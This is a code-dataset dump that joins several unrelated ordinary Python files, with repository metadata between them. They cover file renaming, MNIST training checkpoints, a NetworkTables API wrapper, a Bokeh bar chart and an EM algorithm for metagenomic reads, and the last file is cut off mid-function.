file_lists.sort(key=lambda file: pathlib.Path(full_path(root, file)).stat().st_ctime)
filter_path = []
for path in file_lists:
f_path = full_path(root, path)
if pathlib.Path(f_path).is_file():
if is_md_file(f_path):
filter_path.append(path)
return filter_path
def make_rename(sub_line):
"""
_xx.yyy:xx-yyy
xx-yyy:xx-yyy
xx.yyy:xx-yyy
-xx.yyy:xx-yyy
.xx-yyy:xx-yyy
你好:你好
💻:💻
:param sub_line:
:return:
"""
# 如果开头的数字和后面的名称中间包含下方字符,则做截取操作
if sub_line and sub_line[0] in START_REMOVE_LISTS:
slice_symbol_str = sub_line[1:]
else:
slice_symbol_str = sub_line
if '.' in slice_symbol_str:
str_replace_dot_inline = slice_symbol_str.replace('.', '-')
rename_str = str_replace_dot_inline
else:
rename_str = slice_symbol_str
return rename_str
def rename_path_without_exclude(root_path, exclude_seq):
"""
获取指定目录下排除某些目录的子目录
:param root_path: str,
:param exclude_seq: iterable,
:return:
"""
exclude_dirs, exclude_files = exclude_seq
# def _not_in(all_seq, filter_seq):
# """
# 使用 not in
# :param all_seq:
# :param filter_seq:
# :return:
# """
# return [item for item in all_seq if item not in filter_seq]
# def _filter_sth(seq, exclude):
# """
# 使用filter
# :param seq:
# :param exclude:
# :return:
# """
# return list(filter(lambda x: x not in exclude, seq))
def _subtract_set(seq, exclude):
"""
差集法
:param seq:
:param exclude:
:return:
"""
return list(set(seq) - set(exclude))
for root, dirs, files in os.walk(root_path, topdown=False):
# [python - Excluding directories in os.walk - Stack Overflow]
# (https://stackoverflow.com/questions/19859840/excluding-directories-in-os-walk)
# 此处有三种去重的方式,选择~~自己习惯的~~,性能最好且见名识意的
dirs[:] = _subtract_set(dirs, exclude_dirs)
files[:] = _subtract_set(files, exclude_files)
count_set = set()
count = 0
def handler_action(_root, path_item, is_file=True):
nonlocal count, count_set
add_suffix = ''
if is_file:
add_suffix = '.md'
reg_exp = r'\d+'
reg_match_obj = reg_startswith(path_item, reg_exp)
if reg_match_obj:
# 本来有数字
digital = reg_match_obj.group()
count = int(digital)
count_set.add(count)
if is_file:
deal_line = pathlib.PurePath(path_item).stem
else:
deal_line = pathlib.PurePath(path_item).parts[-1]
sub_line = re.sub(reg_exp, "", deal_line)
if sub_line.startswith('.'):
sub_line = sub_line[1:]
sub_name = make_rename(sub_line)
new_name_with_suffix = f'{digital}.{sub_name}{add_suffix}'
else:
if is_file:
path_str = pathlib.PurePath(path_item).stem
else:
path_str = pathlib.PurePath(path_item).parts[-1]
new_name = make_rename(path_str)
# 找出最大count,然后+1作为新编号
if count_set:
count = max(count_set)
count += 1
count_set.add(count)
new_name_with_suffix = f'{count:02}.{new_name}{add_suffix}'
old = os.path.join(_root, path_item)
new = os.path.join(_root, new_name_with_suffix)
return old, new
for dir_item in dirs:
old_dir_with_full_path, new_dir_with_full_path = handler_action(root, dir_item, is_file=False)
rename_path(old_dir_with_full_path, new_dir_with_full_path)
print(f'Direc Convert: {old_dir_with_full_path} ***to*** {new_dir_with_full_path}')
order_files = order_file_list_by_ctime(root, files)
for file_item in order_files:
old_name_with_full_path, new_name_with_full_path = handler_action(root, file_item)
rename_path(old_name_with_full_path, new_name_with_full_path)
print(f'File Convert: {old_name_with_full_path} ===to==== {new_name_with_full_path}')
def rename_path(old, new):
p = pathlib.Path(fr'{old}')
target = pathlib.Path(fr'{new}')
p.rename(target)
return 0
def main():
"""
找到排除的子目录及目录下的子文件
对目录执行rename操作
:return:
"""
exclude_children = get_exclude_children(EXCLUDE_DIR)
# 直接重命名给定子目录,而不是docs
for path in ['💡科普', '🛠软件工具', '💻工作', '📌TODO', '💰投资理财']:
# for path in [r'Python\16.设计模式']:
root = full_path(ROOT_PATH, path)
print(root)
rename_path_without_exclude(root, exclude_children)
if __name__ == '__main__':
main()
| 2.4375 | 2 |
mtinkerer/utils.py | Legutier/mtinkerer | 0 | 12764964 | <filename>mtinkerer/utils.py<gh_stars>0
import sys
def dir_slash():
slash = '/'
if 'win' in sys.platform: slash = '\\'
return slash
| 2.078125 | 2 |
hackerrank/Algorithms/Sherlock and The Beast/test.py | ATrain951/01.python-com_Qproject | 4 | 12764965 | <gh_stars>1-10
import io
import unittest
from contextlib import redirect_stdout
import solution
class TestQ(unittest.TestCase):
def test_case_0(self):
text_trap = io.StringIO()
with redirect_stdout(text_trap):
solution.decentNumber(1)
solution.decentNumber(3)
solution.decentNumber(5)
solution.decentNumber(11)
self.assertEqual(text_trap.getvalue(),
'-1\n' +
'555\n' +
'33333\n' +
'55555533333\n')
def test_case_1(self):
text_trap = io.StringIO()
with redirect_stdout(text_trap):
solution.decentNumber(15)
solution.decentNumber(13)
self.assertEqual(text_trap.getvalue(),
'555555555555555\n' +
'5553333333333\n')
if __name__ == '__main__':
unittest.main()
| 2.828125 | 3 |
find_center.py | ryanbanderson/volume_measure | 0 | 12764966 | import matplotlib.pyplot as plot
import numpy as np
#Function to get x and y coordinates from the first 10 clicks, then close the image.
def onclick(event):
x.append(event.xdata)
y.append(event.ydata)
print(len(x))
xval = int(event.xdata)
yval = int(event.ydata)
print(str([xval,yval]))
if len(x) == 10:
event.canvas.mpl_disconnect(cid)
print('DISCONNECT')
plot.close()
'''
This script takes a DEM image as input, and allows the user to click 10 points along the rim. A circle is fit to the
points and the center coordinates are returned
'''
def circlefit(dem):
#define x and y as global list variables
global x,y
x = []
y = []
#show the DEM
plot.imshow(dem)
ax = plot.gca()
fig = plot.gcf()
fig.suptitle('Click 10 points on the crater rim to fit with a circle:')
#Set up to run the function onclick every time the user clicks the image
global cid
cid = fig.canvas.mpl_connect('button_press_event',onclick)
plot.show()
# define coordinates as arrays
x = np.array(x)
y = np.array(y)
# create arrays used in circle calculation
a1 = np.array([x, y, np.ones(np.shape(x))])
a2 = np.array([-(x ** 2 + y ** 2)])
# solve the least squares fit to get the center point
a = np.linalg.lstsq(a1.T, a2.T, rcond=None)[0]
xc = -0.5 * a[0]
yc = -0.5 * a[1]
return xc, yc | 3.421875 | 3 |
utils.py | bmwant/wcbot | 0 | 12764967 | import logging
import coloredlogs
FORMAT = '[%(name)s] %(levelname)s:%(message)s'
FORMATTER = logging.Formatter(fmt=FORMAT)
def get_logger(name='default', level=logging.DEBUG, colored=False):
logger = logging.getLogger(name)
logger.propagate = False
logger.setLevel(level)
if not logger.handlers:
handler = logging.StreamHandler()
handler.setFormatter(fmt=FORMATTER)
logger.addHandler(handler)
if colored:
coloredlogs.install(level=level, logger=logger)
return logger
| 2.59375 | 3 |
09_checkpoints.py | psteinb/20220308-dlr-pytorchintro | 1 | 12764968 | ## https://notes.desy.de/s/ljPrespZd#Infrastructure--Cluster-login
import torch
## for the code to work, install torchvision
## $ python -m pip install --user -I --no-deps torchvision
import torchvision
from torchvision import datasets, transforms
## NB: in case torchvision cannot be found inside a jupyter notebook, fix the PYTHONPATH through
## import sys
## sys.path.append("/home/haicore-project-ws-hip-2021/mk7540/.local/lib/python3.8/site-packages/")
def load_data(
somepath,
norm_loc=(0.1307,), ## mu of normal dist to normalize by
norm_scale=(0.3081,), ## sigma of normal dist to normalize by
train_kwargs={"batch_size": 64, "shuffle": True},
test_kwargs={"batch_size": 1_000},
use_cuda=torch.cuda.device_count() > 0,
):
"""load MNIST data and return train/test loader object"""
transform_ = transforms.Compose(
# TODO where do the magic numbers come from?
[transforms.ToTensor(), transforms.Normalize(norm_loc, norm_scale)]
)
train_dataset = datasets.MNIST(
somepath, download=True, transform=transform_, train=True
)
test_dataset = datasets.MNIST(
somepath, download=True, transform=transform_, train=False
)
if use_cuda:
train_kwargs.update({"num_workers": 1, "pin_memory": True, "shuffle": True})
test_kwargs.update({"num_workers": 1, "pin_memory": True, "shuffle": True})
train_loader = torch.utils.data.DataLoader(train_dataset, **train_kwargs)
test_loader = torch.utils.data.DataLoader(test_dataset, **test_kwargs)
return train_loader, test_loader
import torch.nn as nn
import torch.nn.functional as F
class MyNetwork(nn.Module):
"""a very basic relu neural network involving conv, dense, max_pool and dropout layers"""
def __init__(self):
super(MyNetwork, self).__init__()
self.conv1 = nn.Conv2d(1, 32, 3, 1)
self.conv2 = nn.Conv2d(32, 64, 3)
self.dropout1 = nn.Dropout(0.25)
self.dropout2 = nn.Dropout(0.5)
self.fc1 = nn.Linear(9216, 128)
self.fc2 = nn.Linear(128, 10)
def forward(self, x):
x = self.conv1(x)
x = F.relu(x)
x = self.conv2(x)
x = F.relu(x)
x = F.max_pool2d(x, 2)
x = self.dropout1(x)
x = torch.flatten(x, 1)
x = self.fc1(x)
x = F.relu(x)
x = self.dropout2(x)
x = self.fc2(x)
# x.shape = (batchsize, 10)
output = F.log_softmax(x, dim=1)
return output
from pathlib import Path
import torch.optim as optim
# from torch.utils.tensorboard import SummaryWriter
from tensorboardX import SummaryWriter
def main(somepath="./pytorch-data"):
"""load the data set and run a random init CNN on it"""
# is a GPU available?
cuda_present = torch.cuda.is_available()
ndevices = torch.cuda.device_count()
use_cuda = cuda_present and ndevices > 0
device = torch.device("cuda" if use_cuda else "cpu") # "cuda:0" ... default device
# "cuda:1" would be GPU index 1, "cuda:2" etc
train_loader, test_loader = load_data(somepath, use_cuda=use_cuda)
model = MyNetwork().to(device)
optimizer = optim.Adadelta(model.parameters(), lr=1.0)
max_nepochs = 1
log_interval = 5
init_params = list(model.parameters())[0].clone().detach()
writer = SummaryWriter(log_dir="logs", comment="this is the test of SummaryWriter")
model.train(True)
chpfolder = Path("chkpts")
if not chpfolder.is_dir():
chpfolder.mkdir()
for epoch in range(1, max_nepochs + 1):
for batch_idx, (X, y) in enumerate(train_loader):
# print("train", batch_idx, X.shape, y.shape)
X, y = X.to(device), y.to(device)
# download from GPU to CPU: X_cpu = X.cpu()
# download from GPU to CPU: X_cpu = X.to(torch.device("cpu"))
# download from GPU to CPU: X_cpu = X.detach().numpy()
optimizer.zero_grad()
prediction = model(X)
loss = F.nll_loss(prediction, y)
loss.backward()
optimizer.step()
if batch_idx % log_interval == 0:
print(
"Train Epoch:",
epoch,
batch_idx * len(X),
len(train_loader.dataset),
loss.item(),
)
if batch_idx % 10 == 0:
writer.add_scalar("Loss/train/batch10", loss.item(), batch_idx)
# epoch finished
cpath = chpfolder / f"epoch-{epoch:03.0f}.pth"
torch.save(
{
"final_epoch": epoch,
"model_state_dict": model.state_dict(),
"optimizer_state_dict": optimizer.state_dict(),
},
cpath,
)
assert cpath.is_file() and cpath.stat().st_size > 0
final_params = list(model.parameters())[0].clone().detach()
assert not torch.allclose(init_params, final_params)
# when to reload chkp
# payload = torch.load(cpath)
# model = MyNetwork()
# model.load_state_dict(payload['model_state_dict'])
# continue learning/training after this
if __name__ == "__main__":
main()
print("Ok. Checkpoint on loading data reached.")
| 2.46875 | 2 |
ntcore/api.py | amorygalili/pynetworktables | 0 | 12764969 | <reponame>amorygalili/pynetworktables
# validated: 2018-11-27 DS 8eafe7f32561 cpp/ntcore_cpp.cpp
from .connection_notifier import ConnectionNotifier
from .dispatcher import Dispatcher
from .ds_client import DsClient
from .entry_notifier import EntryNotifier
from .rpc_server import RpcServer
from .storage import Storage
from ntcore.constants import NT_NOTIFY_IMMEDIATE, NT_NOTIFY_NEW
_is_new = NT_NOTIFY_IMMEDIATE | NT_NOTIFY_NEW
class NtCoreApi(object):
"""
Internal NetworkTables API wrapper
In theory you could create multiple instances of this
and talk to multiple NT servers or create multiple
NT servers... though, I don't really know why one
would want to do this.
"""
def __init__(self, entry_creator, verbose=False):
self.conn_notifier = ConnectionNotifier(verbose=verbose)
self.entry_notifier = EntryNotifier(verbose=verbose)
self.rpc_server = RpcServer(verbose=verbose)
self.storage = Storage(self.entry_notifier, self.rpc_server, entry_creator)
self.dispatcher = Dispatcher(self.storage, self.conn_notifier, verbose=verbose)
self.ds_client = DsClient(self.dispatcher, verbose=verbose)
def stop(self):
self.ds_client.stop()
self.dispatcher.stop()
self.rpc_server.stop()
self.entry_notifier.stop()
self.conn_notifier.stop()
self.storage.stop()
def destroy(self):
self.ds_client = None
self.dispatcher = None
self.rpc_server = None
self.entry_notifier = None
self.entry_notifier = None
self.conn_notifier = None
self.storage = None
#
# Table functions
#
def getEntry(self, name):
return self.storage.getEntry(name)
def getEntryId(self, name):
return self.storage.getEntryId(name)
def getEntries(self, prefix, types):
return self.storage.getEntries(prefix, types)
def getEntryNameById(self, local_id):
return self.storage.getEntryNameById(local_id)
def getEntryTypeById(self, local_id):
return self.storage.getEntryTypeById(local_id)
def getEntryValue(self, name):
return self.storage.getEntryValue(name)
def getEntryValueById(self, local_id):
return self.storage.getEntryValueById(local_id)
def setDefaultEntryValue(self, name, value):
return self.storage.setDefaultEntryValue(name, value)
def setDefaultEntryValueById(self, local_id, value):
return self.storage.setDefaultEntryValueById(local_id, value)
def setEntryValue(self, name, value):
return self.storage.setEntryValue(name, value)
def setEntryValueById(self, local_id, value):
return self.storage.setEntryValueById(local_id, value)
def setEntryTypeValue(self, name, value):
self.storage.setEntryTypeValue(name, value)
def setEntryTypeValueById(self, local_id, value):
self.storage.setEntryTypeValueById(local_id, value)
def setEntryFlags(self, name, flags):
self.storage.setEntryFlags(name, flags)
def setEntryFlagsById(self, local_id, flags):
self.storage.setEntryFlagsById(local_id, flags)
def getEntryFlags(self, name):
return self.storage.getEntryFlags(name)
def getEntryFlagsById(self, local_id):
return self.storage.getEntryFlags(local_id)
def deleteEntry(self, name):
self.storage.deleteEntry(name)
def deleteEntryById(self, local_id):
self.storage.deleteEntry(local_id)
def deleteAllEntries(self):
self.storage.deleteAllEntries()
def getEntryInfo(self, prefix, types):
return self.storage.getEntryInfo(prefix, types)
def getEntryInfoById(self, local_id):
return self.storage.getEntryInfoById(local_id)
#
# Entry notification
#
def addEntryListener(self, prefix, callback, flags):
return self.storage.addListener(prefix, callback, flags)
def addEntryListenerById(self, local_id, callback, flags):
return self.storage.addListenerById(local_id, callback, flags)
def addEntryListenerByIdEx(
self, fromobj, key, local_id, callback, flags, paramIsNew
):
if paramIsNew:
def listener(item):
key_, value_, flags_, _ = item
callback(fromobj, key, value_.value, (flags_ & _is_new) != 0)
else:
def listener(item):
key_, value_, flags_, _ = item
callback(fromobj, key, value_.value, flags_)
return self.storage.addListenerById(local_id, listener, flags)
def createEntryListenerPoller(self):
return self.entry_notifier.createPoller()
def destroyEntryListenerPoller(self, poller_uid):
self.entry_notifier.removePoller(poller_uid)
def addPolledEntryListener(self, poller_uid, prefix, flags):
return self.storage.addPolledListener(poller_uid, prefix, flags)
def addPolledEntryListenerById(self, poller_uid, local_id, flags):
return self.storage.addPolledListenerById(poller_uid, local_id, flags)
def pollEntryListener(self, poller_uid, timeout=None):
return self.entry_notifier.poll(poller_uid, timeout=timeout)
def cancelPollEntryListener(self, poller_uid):
self.entry_notifier.cancelPoll(poller_uid)
def removeEntryListener(self, listener_uid):
self.entry_notifier.remove(listener_uid)
def waitForEntryListenerQueue(self, timeout):
return self.entry_notifier.waitForQueue(timeout)
#
# Connection notifications
#
def addConnectionListener(self, callback, immediate_notify):
return self.dispatcher.addListener(callback, immediate_notify)
def createConnectionListenerPoller(self):
return self.conn_notifier.createPoller()
def destroyConnectionListenerPoller(self, poller_uid):
self.conn_notifier.removePoller(poller_uid)
def addPolledConnectionListener(self, poller_uid, immediate_notify):
return self.dispatcher.addPolledListener(poller_uid, immediate_notify)
def pollConnectionListener(self, poller_uid, timeout=None):
return self.conn_notifier.poll(poller_uid, timeout=timeout)
def cancelPollConnectionListener(self, poller_uid):
self.conn_notifier.cancelPoll()
def removeConnectionListener(self, listener_uid):
self.conn_notifier.remove(listener_uid)
def waitForConnectionListenerQueue(self, timeout):
return self.conn_notifier.waitForQueue(timeout)
#
# TODO: RPC stuff not currently implemented
# .. there's probably a good pythonic way to implement
# it, but I don't really want to deal with it now.
# If you care, submit a PR.
#
# I would have the caller register the server function
# via a docstring.
#
#
# Client/Server Functions
#
def setNetworkIdentity(self, name):
self.dispatcher.setIdentity(name)
def getNetworkMode(self):
return self.dispatcher.getNetworkMode()
# python-specific
def startTestMode(self, is_server):
if self.dispatcher.startTestMode(is_server):
self.storage.m_server = is_server
return True
else:
return False
def startServer(self, persist_filename, listen_address, port):
return self.dispatcher.startServer(persist_filename, listen_address, port)
def stopServer(self):
self.dispatcher.stop()
def startClient(self):
return self.dispatcher.startClient()
def stopClient(self):
self.dispatcher.stop()
def setServer(self, server_or_servers):
self.dispatcher.setServer(server_or_servers)
def setServerTeam(self, teamNumber, port):
self.dispatcher.setServerTeam(teamNumber, port)
def startDSClient(self, port):
self.ds_client.start(port)
def stopDSClient(self):
self.ds_client.stop()
def setUpdateRate(self, interval):
self.dispatcher.setUpdateRate(interval)
def flush(self):
self.dispatcher.flush()
def getRemoteAddress(self):
if not self.dispatcher.isServer():
for conn in self.dispatcher.getConnections():
return conn.remote_ip
def getIsConnected(self):
return self.dispatcher.isConnected()
def setVerboseLogging(self, verbose):
self.conn_notifier.setVerboseLogging(verbose)
self.dispatcher.setVerboseLogging(verbose)
self.entry_notifier.setVerboseLogging(verbose)
self.rpc_server.setVerboseLogging(verbose)
#
# Persistence
#
def savePersistent(self, filename):
return self.storage.savePersistent(filename, periodic=False)
def loadPersistent(self, filename):
return self.storage.loadPersistent(filename)
def saveEntries(self, filename, prefix):
return self.storage.saveEntries(prefix, filename=filename)
def loadEntries(self, filename, prefix):
return self.storage.loadEntries(filename=filename, prefix=prefix)
| 2.234375 | 2 |
src/toncli/modules/utils/func/commands.py | disintar/toncli | 25 | 12764970 | <gh_stars>10-100
import os
import subprocess
import sys
from typing import Optional, List
import yaml
from colorama import Fore, Style
from toncli.modules.utils.system.conf import config_folder, executable, getcwd
from toncli.modules.utils.system.log import logger
from toncli.modules.utils.system.project import migrate_project_struction
from toncli.modules.utils.system.project_conf import ProjectConf, TonProjectConfig
bl = Fore.CYAN
gr = Fore.GREEN
rs = Style.RESET_ALL
def build(project_root: str,
cwd: Optional[str] = None,
func_args: List[str] = None,
contracts: List[TonProjectConfig] = None,
use_tests_lib: bool = False) -> Optional[str]:
"""
Build func file(s) and save result fift file to location
:param contracts: contracts to build
:param func_args: add arguments to func
:param project_root: Files to build in needed order
:param cwd: If you need to change root of running script pass it here
:param use_tests_lib: Use stdlib-tests.func
:return:
"""
if not contracts:
project_config = ProjectConf(project_root)
contracts = project_config.contracts
if not func_args:
func_args = []
output = []
for contract in contracts:
output.append(
build_files(contract.func_files_locations, contract.to_save_location, func_args, cwd,
use_tests_lib=use_tests_lib))
if len(contract.func_tests_files_locations) and use_tests_lib:
output.append(
build_files([f"{config_folder}/func-libs/tests-helpers.func", *contract.func_tests_files_locations],
contract.to_save_tests_location, [], cwd,
use_tests_lib=True))
return "\n".join(list(map(str, output)))
def build_files(func_files_locations: List[str], to_save_location: str, func_args: List[str] = None,
cwd: Optional[str] = None, use_tests_lib: bool = False):
build_command = [os.path.abspath(executable['func']), *func_args, "-o",
os.path.abspath(to_save_location), "-SPA",
os.path.abspath(
f"{config_folder}/func-libs/stdlib.func") if not use_tests_lib else os.path.abspath(
f"{config_folder}/func-libs/stdlib-tests.func"),
*[os.path.abspath(i) for i in func_files_locations]]
get_output = subprocess.check_output(build_command, cwd=getcwd() if not cwd else os.path.abspath(cwd))
if get_output:
return get_output.decode()
| 2.078125 | 2 |
sysinv/sysinv/sysinv/sysinv/openstack/common/keystone_objects.py | Wind-River/starlingx-config | 0 | 12764971 | <gh_stars>0
#
# Copyright (c) 2015 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
import datetime
import iso8601
from oslo_log import log
LOG = log.getLogger(__name__)
class Token(object):
def __init__(self, token_data, token_id, region_name):
self.expired = False
self.data = token_data
self.token_id = token_id
self.region_name = region_name
def set_expired(self):
self.expired = True
def is_expired(self, within_seconds=300):
if not self.expired:
end = iso8601.parse_date(self.data['token']['expires_at'])
now = iso8601.parse_date(datetime.datetime.utcnow().isoformat())
delta = abs(end - now).seconds
return delta <= within_seconds
return True
def get_id(self):
"""
Get the identifier of the token.
"""
return self.token_id
def _get_service_url(self, service_type, service_name, interface_type):
"""
Search the catalog of a service for the url based on the interface
Returns: url or None on failure
"""
for catalog in self.data['token']['catalog']:
if catalog['type'] == service_type:
if catalog['name'] == service_name:
if len(catalog['endpoints']) != 0:
for endpoint in catalog['endpoints']:
if ((endpoint['interface'] == interface_type) and
(endpoint['region'] == self.region_name)):
return endpoint['url']
return None
def get_service_admin_url(self, service_type, service_name):
"""
Search the catalog of a service for the administrative url
Returns: admin url or None on failure
"""
return self._get_service_url(service_type, service_name, 'admin')
def get_service_internal_url(self, service_type, service_name):
"""
Search the catalog of a service for the administrative url
Returns: admin url or None on failure
"""
return self._get_service_url(service_type, service_name, 'internal')
def get_service_public_url(self, service_type, service_name):
"""
Search the catalog of a service for the administrative url
Returns: admin url or None on failure
"""
return self._get_service_url(service_type, service_name, 'public')
def get_service_url(self, service_type, service_name):
return self.get_service_admin_url(service_type, service_name)
| 2.375 | 2 |
linear_search.py | gsuryalss/searching | 0 | 12764972 | <gh_stars>0
"""
Linear search is used on a collections of items. It relies on the technique of traversing a list from
start to end by exploring properties of all the elements that are found on the way.
The time complexity of the linear search is O(N) because each element in an array is compared only once.
"""
def linear_search(arr_param, item):
pos = 0
found = False
while pos < len(arr_param) and not found:
if arr_param[pos] == item:
found = True
print("Position", pos)
else:
pos += 1
return found
arr = []
print("Linear Search\n")
# array size
m = int(input("Enter the array size:>>"))
# array input
print("Enter the array elements(new line):\n")
for l in range(m):
arr.append(int(input()))
# input search element
find = int(input("Enter the search value:>>"))
# search the element in input array
print("Value Found" if linear_search(arr, find) else "Value Not Found")
| 4.09375 | 4 |
src/util/constants.py | radandreicristian/traffic-ode | 2 | 12764973 | METR_LA_DATASET_NAME = 'metr_la'
PEMS_BAY_DATASET_NAME = 'pems_bay'
IN_MEMORY = 'mem'
ON_DISK = 'disk'
| 0.847656 | 1 |
Collision/Collision_BarChart.py | ChairOfStructuralMechanicsTUM/Mechanics_Apps | 11 | 12764974 | from bokeh.plotting import figure
from bokeh.models import ColumnDataSource, Range1d, FuncTickFormatter, FixedTicker
from math import pi, floor
#ColourOptions = ["red","blue","green","black","yellow","purple"]
class Collision_BarChart(object):
def __init__(self, xVals, yVals, colours = None, width=None):
self.xVals = xVals
self.yVals = yVals
self.colours = colours
self.width = width
self.create_BarChart()
def create_BarChart(self):
xVals = self.xVals
yVals = self.yVals
colours = self.colours
width = self.width
Max = 0
Min=0
N=len(xVals)
# create list of colours
if (colours==None):
colours=list(xVals)
for i in range(0,N):
colours[i]="red"
else:
if (not isinstance(colours,list)):
colours=[colours]
for i in range(1,N):
colours.append(colours[0])
# create list of widths
if (width==None):
width=[]
for i in range(0,N):
width.append(1)
# initialise values for loop
self.fig=figure(tools="")
self.barSources=[]
x=0
places=[]
label_places=[]
index={}
for i in range(0,N):
# add ColumnDataSource describing each bar
self.barSources.append(ColumnDataSource(data=dict(x=[x, x, x+width[i],x+width[i]],
y=[0,yVals[i], yVals[i], 0])))
# update Max and Min for y_range
if (yVals[i]+1>Max):
Max=yVals[i]+1
elif (yVals[i]<0 and yVals[i]-1<Min):
Min=yVals[i]-1
# create bar
self.fig.patch(x='x', y='y', fill_color=colours[i], source=self.barSources[i], line_color=None)
br=xVals[i].find('\n')
places.append(x+width[i]/2.0)
if (br==-1):
# remember bar position
label_places.append(x+width[i]/2.0)
# remember label that should be written at that postion
index[str(int(100*(x+width[i]/2.0)))] = [xVals[i]]
else:
label=[]
while (br!=-1):
label.append(xVals[i][0:br])
xVals[i]=xVals[i][br+1:]
br=xVals[i].find('\n')
label.append(xVals[i])
N=len(label)
for j in range(0,N):
index[str(int(100*(x+width[i]*(j+1)/(N+1.0))))] = [label[j]]
label_places.append((floor(100*(x+width[i]*(j+1)/(N+1.0)))/100.0))
# increase x
x+=width[i]+1
# set figure properties
self.fig.x_range=Range1d(-1,x)
self.fig.y_range=Range1d(Min,Max)
self.fig.grid.visible=False
self.fig.xaxis.major_label_text_font_size="14pt"
self.fig.xaxis.major_tick_line_color=None
self.fig.xaxis.major_label_orientation=pi/2
self.fig.yaxis.major_label_orientation=pi/2
self.fig.yaxis.axis_label="Kinetic Energy ( Joule )"
self.fig.toolbar.logo = None
# only give x ticks at bars
self.fig.xaxis[0].ticker=FixedTicker(ticks=label_places)
# save vals in ColumnDataSource so ticker_func can use it as default val
index_obj = ColumnDataSource(data=index)
#print(index_obj.data)
# define function which assigns values to tick labels
# def ticker_func(labels=index_obj):
# return labels.data[str(tick*100)]
ticker_func_JS = """
var idx = tick*100;
return labels.data[idx.toString()]
"""
self.index_obj = index_obj
# call ticker_func
self.fig.xaxis[0].formatter = FuncTickFormatter(code=ticker_func_JS, args=dict(labels=self.index_obj))
def change_label(self):
self.index_obj.data = {'50': [self.xVals[0]], '250': [self.xVals[1]], '450': [self.xVals[2]]}
def setTitle(self,title):
self.fig.title=title
def getFig(self):
return self.fig
# define operator[]
def __getItem__ (self,key):
return self.barSources[key].data
def __setItem__ (self,key):
return self.barSources[key].data
def setHeight(self,key,height):
self.barSources[key].data=dict(x=list(self.barSources[key].data['x']),y=[0,height,height,0])
def Height(self,height):
self.fig.height=height
def Width(self,width):
self.fig.width=width
| 2.84375 | 3 |
EMAlgorithm.py | marinaRupe/FER.BCsThesis | 1 | 12764975 | <gh_stars>1-10
import math
from TaxonomyTree import TaxonomyTree
from threading import Thread
from multiprocessing import Process
class EMAlgorithm:
def __init__(self):
self.taxTree = TaxonomyTree()
self.reads, self.genomes = [], []
self.pi_list, self.delta_list = [], []
self.a_list, self.b_list = [], []
self.q_list = []
self.y_list = []
self.groups = {} # key - TI
self.parentTIs = {} # key - TI (get parent TI by organism TI)
def start(self, alignmentsFile):
taxTreeThread = Thread(target=self.taxTree.build)
taxTreeThread.start()
# First substep
alignments = self.calculateInitialParameters(alignmentsFile)
result = self.getResult()
taxTreeThread.join()
print("\nFirst result:\n")
self.printResult(result)
bestTIs = self.getBestTIsPerGroup(result)
# Second substep
self.calculateInitialParameters(alignmentsFile, alignments, bestTIs)
result = self.getResult()
print("\nFinal result:\n")
self.printResult(result)
def calculateInitialParameters(self, alignmentsFile, alignments={}, bestTIs=[]):
IS_SECOND_STEP = bool(alignments)
self.reads, self.a_list, self.b_list, self.y_list = [], [], [], []
q_dict, map_freq, unique, non_unique = {}, {}, {}, {}
genomes = set()
maxScore = 0
if not IS_SECOND_STEP:
print("\nSetting the initial parameters...")
with open(alignmentsFile) as alignFile:
for line in alignFile:
if not line.startswith('@'):
fields = line.strip().split("\t")
QNAME = fields[0]
RNAME = fields[2] # reference marker gene
if RNAME != "*":
# calculate score
CIGAR = fields[5]
matches = n = 0
num = ''
for i in range(len(CIGAR)):
c = CIGAR[i]
if c.isdigit():
num += c
else:
if c == 'M':
matches += int(num)
n += int(num)
num = ''
score = n / matches
TIs = RNAME.split("|")[3].split(",")
alignments[QNAME] = TIs, score
else:
print("Resetting the parameters...")
for read in alignments:
self.reads.append(read)
TIs, score = alignments[read][0], alignments[read][1]
if score > maxScore:
maxScore = score
if IS_SECOND_STEP:
TIsLeft = []
for TI in TIs:
if TI in bestTIs:
TIsLeft.append(TI)
TIs = TIsLeft
for TI in TIs:
genomes.add(TI)
q_dict[read, TI] = score
map_freq[TI] = map_freq.get(TI, 0) + 1
if len(TIs) == 1:
unique[TI] = unique.get(TI, 0) + 1
else:
non_unique[TI] = non_unique.get(TI, 0) + 1
if len(TIs) == 1:
self.y_list.append(1)
else:
self.y_list.append(0)
self.genomes = list(genomes)
self.q_list = []
for i in range(len(self.reads)):
q_list_for_read = []
for j in range(len(self.genomes)):
q_list_for_read.append(math.exp(q_dict.get((self.reads[i], self.genomes[j]), 0) / maxScore))
self.q_list.append(q_list_for_read)
self.pi_list, self.delta_list = [], []
pi0 = delta0 = 1.0 / len(self.genomes)
for i in range(len(self.genomes)):
freq = map_freq[self.genomes[i]]
unique_reads = unique.get(self.genomes[i], 0)
non_unique_reads = non_unique.get(self.genomes[i], 0)
self.a_list.append(freq + unique_reads)
self.b_list.append(freq + non_unique_reads)
self.pi_list.append(pi0)
self.delta_list.append(delta0)
return alignments
def EStep(self):
# expectation of parameters
h = [[0 for j in range(len(self.genomes))] for i in range(len(self.reads))]
h_sum = 0
for i in range(len(self.reads)):
for j in range(len(self.genomes)):
h[i][j] = self.pi_list[j] * pow(self.delta_list[j], 1 - self.y_list[i]) * self.q_list[i][j]
h_sum += h[i][j]
h = [[h[i][j] / h_sum for j in range(len(self.genomes))] for i in range(len(self.reads))]
return h, h_sum
def MStep(self, h, N):
# maximization of parameters
pi_list = list()
delta_list = list()
a_sum = sum(self.a_list)
b_sum = sum(self.b_list)
for j in range(len(self.genomes)):
h_j_sum_by_reads = 0
h_j_with_y_sum_by_reads = 0
y_sum = 0
for i in range(len(self.reads)):
h_j_sum_by_reads += h[i][j]
h_j_with_y_sum_by_reads += h[i][j] * (1 - self.y_list[i])
y_sum += 1 - self.y_list[i]
pi = self.calculatePi(h_j_sum_by_reads, self.a_list[j], a_sum, N)
pi_list.append(pi)
delta = self.calculateDelta(h_j_with_y_sum_by_reads, y_sum, self.b_list[j], b_sum)
delta_list.append(delta)
return pi_list, delta_list
def calculateLogLikelihood(self):
log_likelihood = 0
for i in range(len(self.reads)):
inner_sum = 0
for j in range(len(self.genomes)):
inner_sum += self.pi_list[j] * (pow(self.delta_list[j], 1 - self.y_list[i]) * self.q_list[i][j])
log_likelihood += math.log(inner_sum)
return log_likelihood
def getBestTIsPerGroup(self, result):
print("\nGetting the best TIs per group...")
for TI in self.genomes:
genome = [r[0] for r in result if r[1] == TI][0], TI
parentTI = self.taxTree.taxNodes[TI].parent.taxId
groupGenome = self.groups.get(parentTI, (0, None))
if genome[0] > groupGenome[0]:
